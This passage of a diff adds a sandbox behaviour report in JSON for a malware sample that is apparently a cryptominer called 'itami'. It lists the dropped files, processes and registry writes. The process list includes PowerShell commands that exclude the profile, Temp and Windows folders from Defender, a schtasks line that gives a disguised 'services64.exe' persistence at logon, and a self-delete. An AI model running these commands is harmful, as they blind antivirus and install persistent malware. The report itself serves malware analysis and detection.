+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\dee95ca75ccebe1cc18b31dca334cd53\\System.Management.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\568282207f7c6c41d18e9e38637dbe77\\System.Numerics.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\568282207f7c6c41d18e9e38637dbe77\\System.Numerics.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\0935f5dce0a38689b9507cb1938fe436\\System.Transactions.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\0935f5dce0a38689b9507cb1938fe436\\System.Transactions.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\1fb6db2ce6d2887fe6f8f620cb092343\\System.Xml.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\1fb6db2ce6d2887fe6f8f620cb092343\\System.Xml.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\37a1d51f35918dd36a0d4e34cc91732e\\System.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\37a1d51f35918dd36a0d4e34cc91732e\\System.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\itami-miner\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\itami\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\3597805b7d7dce423abb491985dd28e8\\mscorlib.ni.dll"
+  ],
+  "processes_created": [
+    "%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe",
+    "C:\\Windows\\System32\\cmd.exe",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+    "C:\\Windows\\System32\\schtasks.exe",
+    "C:\\Windows\\System32\\services64.exe",
+    "C:\\Windows\\System32\\choice.exe",
+    "C:\\Windows\\System32\\Microsoft\\Libs\\sihost64.exe",
+    "C:\\Windows\\explorer.exe",
+    "cmd /c powershell -Command Add-MpPreference -ExclusionPath %UserProfile% & powershell -Command Add-MpPreference -ExclusionPath %AppData% & powershell -Command Add-MpPreference -ExclusionPath %Temp% & powershell -Command Add-MpPreference -ExclusionPath %SystemRoot% & exit",
+    "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\admin",
+    "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\<USER>\\\\AppData\\\\Roaming",
+    "C:\\Windows\\System32\\cmd.exe /c C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Users\\<USER>\\Downloads\\itami.exe",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Users\\<USER>\\Downloads\\itami.exe",
+    "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\<USER>\\\\AppData\\\\Local\\\\Temp",
+    "C:\\Windows\\System32\\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn services64 /tr \"C:\\\\Windows\\\\system32\\\\services64.exe\" & exit",
+    "schtasks /create /f /sc onlogon /rl highest /tn services64 /tr \"C:\\\\Windows\\\\system32\\\\services64.exe\"",
+    "C:\\Windows\\system32\\services64.exe",
+    "C:\\Windows\\System32\\cmd.exe /C choice /C Y /N /D Y /T 3 & Del C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe",
+    "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Windows",
+    "choice /C Y /N /D Y /T 3",
+    "C:\\Windows\\System32\\cmd.exe /c C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Windows\\system32\\services64.exe",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe C:\\Windows\\system32\\services64.exe",
+    "C:\\Windows\\system32\\Microsoft\\Libs\\sihost64.exe"
+  ],
+  "registry_keys_set": [
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\02FAF3E291435468607857694DF5E45B68851868\\Blob",
+      "value": "7E 00 00 00 01 00 00 00 08 00 00 00 00 00 63 F5 89 26 D7 01 09 00 00 00 01 00 00 00 54 00 00 00 30 52 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 0A 2B 06 01 04 01 82 37 0A 03 04 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 06 06 08 2B 06 01 05 05 07 03 07 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 04 00 00 00 01 00 00 00 10 00 00 00 1D 35 54 04 85 78 B0 3F 42 42 4D BF 20 73 0A 3F 0F 00 00 00 01 00 00 00 14 00 00 00 09 B9 10 5C 5B BA 24 34 3C A7 F3 41 C6 24 E1 83 F6 EE 7C 1B 0B 00 00 00 01 00 00 00 26 00 00 00 53 00 65 00 63 00 74 00 69 00 67 00 6F 00 20 00 28 00 41 00 64 00 64 00 54 00 72 00 75 00 73 00 74 00 29 00 00 00 62 00 00 00 01 00 00 00 20 00 00 00 68 7F A4 51 38 22 78 FF F0 C8 B1 1F 8D 43 D5 76 67 1C 6E B2 BC EA B4 13 FB 83 D9 65 D0 6D 2F F2 14 00 00 00 01 00 00 00 14 00 00 00 AD BD 98 7A 34 B4 26 F7 FA C4 26 54 EF 03 BD E0 24 CB 54 1A 1D 00 00 00 01 00 00 00 10 00 00 00 06 F9 58 3C 00 A7 63 C2 3F B9 E0 65 A3 36 6D 55 03 00 00 00 01 00 00 00 14 00 00 0"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\627F8D7827656399D27D7F9044C9FEB3F33EFA9A\\Blob",
+      "value": "09 00 00 00 01 00 00 00 16 00 00 00 30 14 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 01 04 00 00 00 01 00 00 00 10 00 00 00 06 9F 69 79 16 66 90 02 1B 8C 8C A2 C3 07 6F 3A 0F 00 00 00 01 00 00 00 10 00 00 00 5F 3D 1A A6 F4 71 A7 60 66 3E B7 EF 25 42 81 EF 53 00 00 00 01 00 00 00 25 00 00 00 30 23 30 21 06 0B 60 86 48 01 86 F8 45 01 07 30 01 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 62 00 00 00 01 00 00 00 20 00 00 00 AB 70 36 36 5C 71 54 AA 29 C2 C2 9F 5D 41 91 16 3B 16 2A 22 25 01 13 57 D5 6D 07 FF A7 BC 1F 72 14 00 00 00 01 00 00 00 14 00 00 00 5F F3 24 6C 8F 91 24 AF 9B 5F 3E B0 34 6A F4 2D 5C A8 5D CC 1D 00 00 00 01 00 00 00 10 00 00 00 D4 80 3A C3 6C 25 68 17 D4 EC 59 36 F2 9B C4 E7 0B 00 00 00 01 00 00 00 0E 00 00 00 74 00 68 00 61 00 77 00 74 00 65 00 00 00 68 00 00 00 01 00 00 00 08 00 00 00 00 00 87 6A CE 99 D1 01 03 00 00 00 01 00 00 00 14 00 00 00 62 7F 8D 78 27 65 63 99 D2 7D 7F 90 44 C9 FE B3 F3 3E FA 9A 19 00 00 00 01 00 00 00 10 00 00 00 5D C4 5E 2C D1 84 57 91 B"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASMANCS\\FileDirectory",
+      "value": "%windir%\\tracing"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASMANCS\\MaxFileSize",
+      "value": "1048576"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASMANCS\\ConsoleTracingMask",
+      "value": "4294901760"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASMANCS\\FileTracingMask",
+      "value": "4294901760"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASMANCS\\EnableConsoleTracing",
+      "value": "0"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\Tracing\\svchost64_RASMANCS\\EnableFileTracing",
+      "value": "0"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob",
+      "value": "7A 00 00 00 01 00 00 00 0C 00 00 00 30 0A 06 08 2B 06 01 05 05 07 03 09 09 00 00 00 01 00 00 00 68 00 00 00 30 66 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 0A 2B 06 01 04 01 82 37 0A 03 04 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 08 02 02 06 08 2B 06 01 05 05 07 03 06 06 08 2B 06 01 05 05 07 03 07 06 08 2B 06 01 05 05 07 03 09 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 04 00 00 00 01 00 00 00 10 00 00 00 3E 45 52 15 09 51 92 E1 B7 5D 37 9F B1 87 29 8A 0F 00 00 00 01 00 00 00 14 00 00 00 5A 6D 07 B6 37 1D 96 6A 2F B6 BA 92 82 8C E5 51 2A 49 51 3D 0B 00 00 00 01 00 00 00 30 00 00 00 47 00 6C 00 6F 00 62 00 61 00 6C 00 53 00 69 00 67 00 6E 00 20 00 52 00 6F 00 6F 00 74 00 20 00 43 00 41 00 20 00 2D 00 20 00 52 00 31 00 00 00 62 00 00 00 01 00 00 00 20 00 00 00 EB D4 10 40 E4 BB 3E C7 42 C9 E3 81 D3 1E F2 A4 1A 48 B6 68 5C 96 E7 CE F3 C1 DF 6C D4 33 1C 99 14 00 00 00 01 00 00 00 14 00 00 00 60 7B 66 1A 45 0D 97 CA 89 50 2F 7D 04 CD 34 A8 FF FC FD 4B 1D 00 00 00 01 0"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\D1EB23A46D17D68FD92564C2F1F1601764D8E349\\Blob",
+      "value": "53 00 00 00 01 00 00 00 43 00 00 00 30 41 30 22 06 0C 2B 06 01 04 01 B2 31 01 02 01 05 01 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 30 1B 06 05 67 81 0C 01 03 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 5C 00 00 00 01 00 00 00 04 00 00 00 00 08 00 00 19 00 00 00 01 00 00 00 10 00 00 00 2A A1 C0 5E 2A E6 06 F1 98 C2 C5 E9 37 C9 7A A2 03 00 00 00 01 00 00 00 14 00 00 00 D1 EB 23 A4 6D 17 D6 8F D9 25 64 C2 F1 F1 60 17 64 D8 E3 49 1D 00 00 00 01 00 00 00 10 00 00 00 2E 0D 68 75 87 4A 44 C8 20 91 2E 85 E9 64 CF DB 14 00 00 00 01 00 00 00 14 00 00 00 A0 11 0A 23 3E 96 F1 07 EC E2 AF 29 EF 82 A5 7F D0 30 A4 B4 0B 00 00 00 01 00 00 00 1C 00 00 00 53 00 65 00 63 00 74 00 69 00 67 00 6F 00 20 00 28 00 41 00 41 00 41 00 29 00 00 00 62 00 00 00 01 00 00 00 20 00 00 00 D7 A7 A0 FB 5D 7E 27 31 D7 71 E9 48 4E BC DE F7 1D 5F 0C 3E 0A 29 48 78 2B C8 3E E0 EA 69 9E F4 0F 00 00 00 01 00 00 00 14 00 00 00 3E 8E 64 87 F8 FD 27 D3 22 A2 69 A7 1E DA AC 5D 57 81 12 86 04 00 00 00 01 00 00 00 10 00 0"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob",
+      "value": "68 00 00 00 01 00 00 00 08 00 00 00 00 00 3D B6 5B D9 D5 01 7E 00 00 00 01 00 00 00 08 00 00 00 00 00 10 C5 1E 92 D2 01 62 00 00 00 01 00 00 00 20 00 00 00 E7 68 56 34 EF AC F6 9A CE 93 9A 6B 25 5B 7B 4F AB EF 42 93 5B 50 A2 65 AC B5 CB 60 27 E4 4E 70 19 00 00 00 01 00 00 00 10 00 00 00 91 16 1B 89 4B 11 7E CD C2 57 62 8D B4 60 CC 04 03 00 00 00 01 00 00 00 14 00 00 00 74 2C 31 92 E6 07 E4 24 EB 45 49 54 2B E1 BB C5 3E 61 74 E2 1D 00 00 00 01 00 00 00 10 00 00 00 27 B3 51 76 67 33 1C E2 C1 E7 40 02 B5 FF 22 98 14 00 00 00 01 00 00 00 14 00 00 00 E2 7F 7B D8 77 D5 DF 9E 0A 3F 9E B4 CB 0E 2E A9 EF DB 69 77 0B 00 00 00 01 00 00 00 46 00 00 00 56 00 65 00 72 00 69 00 53 00 69 00 67 00 6E 00 20 00 43 00 6C 00 61 00 73 00 73 00 20 00 33 00 20 00 50 00 75 00 62 00 6C 00 69 00 63 00 20 00 50 00 72 00 69 00 6D 00 61 00 72 00 79 00 20 00 43 00 41 00 00 00 04 00 00 00 01 00 00 00 10 00 00 00 10 FC 63 5D F6 26 3E 0D F3 25 BE 5F 79 CD 67 67 0F 00 00 00 01 00 00 00 10 00 00 00 D7 C6 3B E0 83 7D BA BF 88 1D 4F BF 5F 98 6A D"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob",
+      "value": "09 00 00 00 01 00 00 00 34 00 00 00 30 32 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 5C 00 00 00 01 00 00 00 04 00 00 00 00 08 00 00 19 00 00 00 01 00 00 00 10 00 00 00 74 99 66 CE CC 95 C1 87 41 94 CA 72 03 F9 B6 20 03 00 00 00 01 00 00 00 14 00 00 00 05 63 B8 63 0D 62 D7 5A BB C8 AB 1E 4B DF B5 A8 99 B2 4D 43 1D 00 00 00 01 00 00 00 10 00 00 00 4F 5F 10 69 30 39 8D 09 10 7B 40 C3 C7 CA 8F 1C 0B 00 00 00 01 00 00 00 12 00 00 00 44 00 69 00 67 00 69 00 43 00 65 00 72 00 74 00 00 00 14 00 00 00 01 00 00 00 14 00 00 00 45 EB A2 AF F4 92 CB 82 31 2D 51 8B A7 A7 21 9D F3 6D C8 0F 62 00 00 00 01 00 00 00 20 00 00 00 3E 90 99 B5 01 5E 8F 48 6C 00 BC EA 9D 11 1E E7 21 FA BA 35 5A 89 BC F1 DF 69 56 1E 3D C6 32 5C 0F 00 00 00 01 00 00 00 14 00 00 00 6D CA 5B D0 0D CF 1C 0F 32 70 59 D3 74 B2 9C A6 E3 C5 0A A6 04 00 00 00 01 00 00 00 10 00 00 00 87 CE 0B 7B 2A 0E 49 00 E1 58 71 9B 37 A8 93 72 53 00 00 00 01 00 00 0"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\8782C6C304353BCFD29692D2593E7D44D934FF11\\Blob",
+      "value": "09 00 00 00 01 00 00 00 34 00 00 00 30 32 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 19 00 00 00 01 00 00 00 10 00 00 00 E6 09 7C 8F 76 AB 46 18 99 64 B5 FE 3C D5 C1 D8 0F 00 00 00 01 00 00 00 14 00 00 00 31 D2 54 C6 26 74 C3 51 D6 E6 21 2F 6E 53 17 5A AD E3 17 5C 53 00 00 00 01 00 00 00 26 00 00 00 30 24 30 22 06 0C 60 86 48 01 86 FD 64 01 01 02 04 01 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 62 00 00 00 01 00 00 00 20 00 00 00 F1 C1 B5 0A E5 A2 0D D8 03 0E C9 F6 BC 24 82 3D D3 67 B5 25 57 59 B4 E7 1B 61 FC E9 F7 37 5D 73 14 00 00 00 01 00 00 00 14 00 00 00 42 32 B6 16 FA 04 FD FE 5D 4B 7A C3 FD F7 4C 40 1D 5A 43 AF 0B 00 00 00 01 00 00 00 14 00 00 00 54 00 72 00 75 00 73 00 74 00 77 00 61 00 76 00 65 00 00 00 1D 00 00 00 01 00 00 00 10 00 00 00 EB 1E 70 CF 1E AD 11 52 15 3E 79 EC 90 ED AB A4 03 00 00 00 01 00 00 00 14 00 00 00 87 82 C6 C3 04 35 3B CF D2 96 92 D2 59 3E 7D 44 D9 34 FF 1"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\55A6723ECBF2ECCDC3237470199D2ABE11E381D1\\Blob",
+      "value": "7A 00 00 00 01 00 00 00 0C 00 00 00 30 0A 06 08 2B 06 01 05 05 07 03 09 5C 00 00 00 01 00 00 00 04 00 00 00 00 08 00 00 04 00 00 00 01 00 00 00 10 00 00 00 CA FB 40 A8 4E 39 92 8A 1D FE 8E 2F C4 27 EA EF 03 00 00 00 01 00 00 00 14 00 00 00 55 A6 72 3E CB F2 EC CD C3 23 74 70 19 9D 2A BE 11 E3 81 D1 7E 00 00 00 01 00 00 00 08 00 00 00 00 00 04 2B EB 77 D5 01 7F 00 00 00 01 00 00 00 0C 00 00 00 30 0A 06 08 2B 06 01 05 05 07 03 09 1D 00 00 00 01 00 00 00 10 00 00 00 7C AB 1E 1E 09 5F 21 F0 70 67 08 EC 80 AF FD 30 14 00 00 00 01 00 00 00 14 00 00 00 B5 03 F7 76 3B 61 82 6A 12 AA 18 53 EB 03 21 94 BF FE CE CA 62 00 00 00 01 00 00 00 20 00 00 00 FD 73 DA D3 1C 64 4F F1 B4 3B EF 0C CD DA 96 71 0B 9C D9 87 5E CA 7E 31 70 7A F3 E9 6D 52 2B BD 53 00 00 00 01 00 00 00 24 00 00 00 30 22 30 20 06 0A 2B 06 01 04 01 BD 47 0D 18 01 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 0B 00 00 00 01 00 00 00 3C 00 00 00 54 00 2D 00 54 00 65 00 6C 00 65 00 53 00 65 00 63 00 20 00 47 00 6C 00 6F 00 62 00 61 00 6C 00 20 0"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\3679CA35668772304D30A5FB873B0FA77BB70D54\\Blob",
+      "value": "7E 00 00 00 01 00 00 00 08 00 00 00 00 C0 03 2F 2D F8 D6 01 09 00 00 00 01 00 00 00 34 00 00 00 30 32 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 5C 00 00 00 01 00 00 00 04 00 00 00 00 08 00 00 19 00 00 00 01 00 00 00 10 00 00 00 AD 6D 6F F3 1B 24 01 31 51 F2 79 E2 6A 8C 33 24 0F 00 00 00 01 00 00 00 20 00 00 00 17 FE 16 F3 94 EC 70 A5 BB 0C 67 84 CA B4 0B 1E 61 02 5A E9 D5 0E CA A0 53 1D 6B 4D 99 7B BC 59 0B 00 00 00 01 00 00 00 60 00 00 00 56 00 65 00 72 00 69 00 53 00 69 00 67 00 6E 00 20 00 55 00 6E 00 69 00 76 00 65 00 72 00 73 00 61 00 6C 00 20 00 52 00 6F 00 6F 00 74 00 20 00 43 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 41 00 75 00 74 00 68 00 6F 00 72 00 69 00 74 00 79 00 00 00 62 00 00 00 01 00 00 00 20 00 00 00 23 99 56 11 27 A5 71 25 DE 8C EF EA 61 0D DF 2F A0 78 B5 C8 06 7F 4E 82 82 90 BF B8 60 E8 4B 3C 14 00 00 00 01 00 00 00 14 00 00 00 B6 77 FA 69 48 4"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
+      "value": "1"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
+      "value": "00 00 54 00 45 00 76 00 65 00 6E 00 74 00 4C 00 6F 00 67 00 45 00 76 00 65 00 6E 00 74 00 43 00 6F 00 6E 00 73 00 75 00 6D 00 65 00 72 00"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\\Blob",
+      "value": "09 00 00 00 01 00 00 00 34 00 00 00 30 32 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 5C 00 00 00 01 00 00 00 04 00 00 00 00 08 00 00 19 00 00 00 01 00 00 00 10 00 00 00 BA 4F 39 72 E7 AE D9 DC CD C2 10 DB 59 DA 13 C9 03 00 00 00 01 00 00 00 14 00 00 00 5F B7 EE 06 33 E2 59 DB AD 0C 4C 9A E6 D3 8F 1A 61 C7 DC 25 1D 00 00 00 01 00 00 00 10 00 00 00 8F 76 B9 81 D5 28 AD 47 70 08 82 45 E2 03 1B 63 0B 00 00 00 01 00 00 00 12 00 00 00 44 00 69 00 67 00 69 00 43 00 65 00 72 00 74 00 00 00 14 00 00 00 01 00 00 00 14 00 00 00 B1 3E C3 69 03 F8 BF 47 01 D4 98 26 1A 08 02 EF 63 64 2B C3 62 00 00 00 01 00 00 00 20 00 00 00 74 31 E5 F4 C3 C1 CE 46 90 77 4F 0B 61 E0 54 40 88 3B A9 A0 1E D0 0B A6 AB D7 80 6E D3 B1 18 CF 0F 00 00 00 01 00 00 00 14 00 00 00 E3 5E F0 8D 88 4F 0A 0A DE 2F 75 E9 63 01 CE 62 30 F2 13 A8 04 00 00 00 01 00 00 00 10 00 00 00 D4 74 DE 57 5C 39 B2 D3 9C 85 83 C5 C0 65 49 8A 53 00 00 00 01 00 00 0"
+    },
+    {
+      "key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\services64\\Index"
+    },
+    {
+      "key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\services64\\Id"
+    },
+    {
+      "key": "HKLM\\SYSTEM\\ControlSet001\\Services\\BITS\\Performance\\PerfMMFileName",
+      "value": "Global\\MMF_BITS_s"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\\Blob",
+      "value": "7E 00 00 00 01 00 00 00 08 00 00 00 00 C0 01 B3 96 67 D6 01 09 00 00 00 01 00 00 00 42 00 00 00 30 40 06 08 2B 06 01 05 05 07 03 02 06 0A 2B 06 01 04 01 82 37 0A 03 0C 06 0A 2B 06 01 04 01 82 37 0A 03 04 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 04 00 00 00 01 00 00 00 10 00 00 00 41 03 52 DC 0F F7 50 1B 16 F0 02 8E BA 6F 45 C5 0F 00 00 00 01 00 00 00 14 00 00 00 5B CA A1 C2 78 0F 0B CB 5A 90 77 04 51 D9 6F 38 96 3F 01 2D 62 00 00 00 01 00 00 00 20 00 00 00 06 87 26 03 31 A7 24 03 D9 09 F1 05 E6 9B CF 0D 32 E1 BD 24 93 FF C6 D9 20 6D 11 BC D6 77 07 39 0B 00 00 00 01 00 00 00 1E 00 00 00 44 00 53 00 54 00 20 00 52 00 6F 00 6F 00 74 00 20 00 43 00 41 00 20 00 58 00 33 00 00 00 14 00 00 00 01 00 00 00 14 00 00 00 C4 A7 B1 A4 7B 2C 71 FA DB E1 4B 90 75 FF C4 15 60 85 89 10 1D 00 00 00 01 00 00 00 10 00 00 00 45 58 D5 12 EE CB 27 46 49 20 89 7D E7 B6 60 53 03 00 00 00 01 00 00 00 14 00 00 00 DA C9 02 4F 54 D8 F6 DF 94 93 5F B1 73 26 38 CA 6A D7 7C 13 19 00 00 00 01 0"
+    },
+    {
+      "key": "\\\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Iran Standard Time\\TZI"
+    },
+    {
+      "key": "HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_LOG",
+      "value": "%windir%\\System32\\Bits.log\n"
+    },
+    {
+      "key": "HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_BAK",
+      "value": "%windir%\\System32\\Bits.bak\n"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\\Blob",
+      "value": "7E 00 00 00 01 00 00 00 08 00 00 00 00 C0 01 B3 96 67 D6 01 09 00 00 00 01 00 00 00 3E 00 00 00 30 3C 06 08 2B 06 01 05 05 07 03 02 06 08 2B 06 01 05 05 07 03 03 06 08 2B 06 01 05 05 07 03 04 06 08 2B 06 01 05 05 07 03 09 06 08 2B 06 01 05 05 07 03 01 06 08 2B 06 01 05 05 07 03 08 5C 00 00 00 01 00 00 00 04 00 00 00 00 08 00 00 0F 00 00 00 01 00 00 00 14 00 00 00 CE 0E 65 8A A3 E8 47 E4 67 A1 47 B3 04 91 91 09 3D 05 5E 6F 0B 00 00 00 01 00 00 00 30 00 00 00 44 00 69 00 67 00 69 00 43 00 65 00 72 00 74 00 20 00 42 00 61 00 6C 00 74 00 69 00 6D 00 6F 00 72 00 65 00 20 00 52 00 6F 00 6F 00 74 00 00 00 62 00 00 00 01 00 00 00 20 00 00 00 16 AF 57 A9 F6 76 B0 AB 12 60 95 AA 5E BA DE F2 2A B3 11 19 D6 44 AC 95 CD 4B 93 DB F3 F2 6A EB 14 00 00 00 01 00 00 00 14 00 00 00 E5 9D 59 30 82 47 58 CC AC FA 08 54 36 86 7B 3A B5 04 4D F0 1D 00 00 00 01 00 00 00 10 00 00 00 91 8A D4 3A 94 75 F7 8B B5 24 3D E8 86 D8 10 3C 03 00 00 00 01 00 00 00 14 00 00 00 D4 DE 20 D0 5E 66 FC 53 FE 1A 50 88 2C 78 DB 28 52 CA E4 74 19 00 00 0"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\D69B561148F01C77C54578C10926DF5B856976AD\\Blob",
+      "value": "53 00 00 00 01 00 00 00 40 00 00 00 30 3E 30 1F 06 09 2B 06 01 04 01 A0 32 01 01 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 30 1B 06 05 67 81 0C 01 03 30 12 30 10 06 0A 2B 06 01 04 01 82 37 3C 01 01 03 02 00 C0 5C 00 00 00 01 00 00 00 04 00 00 00 00 08 00 00 19 00 00 00 01 00 00 00 10 00 00 00 D0 FD 3C 9C 38 0D 7B 65 E2 6B 9A 3F ED D3 9B 8F 03 00 00 00 01 00 00 00 14 00 00 00 D6 9B 56 11 48 F0 1C 77 C5 45 78 C1 09 26 DF 5B 85 69 76 AD 1D 00 00 00 01 00 00 00 10 00 00 00 01 72 8E 1E CF 7A 9D 86 FB 3C EC 89 48 AB A9 53 14 00 00 00 01 00 00 00 14 00 00 00 8F F0 4B 7F A8 2E 45 24 AE 4D 50 FA 63 9A 8B DE E2 DD 1B BC 62 00 00 00 01 00 00 00 20 00 00 00 CB B5 22 D7 B7 F1 27 AD 6A 01 13 86 5B DF 1C D4 10 2E 7D 07 59 AF 63 5A 7C F4 72 0D C9 63 C5 3B 0B 00 00 00 01 00 00 00 30 00 00 00 47 00 6C 00 6F 00 62 00 61 00 6C 00 53 00 69 00 67 00 6E 00 20 00 52 00 6F 00 6F 00 74 00 20 00 43 00 41 00 20 00 2D 00 20 00 52 00 33 00 00 00 0F 00 00 00 01 00 00 00 20 00 00 00 52 29 BA 15 B3 1B 0C 6F 4C CA 89 C2 98 5"
+    },
+    {
+      "key": "HKLM\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\2796BAE63F1801E277261BA0D77770028F20EEE4\\Blob",
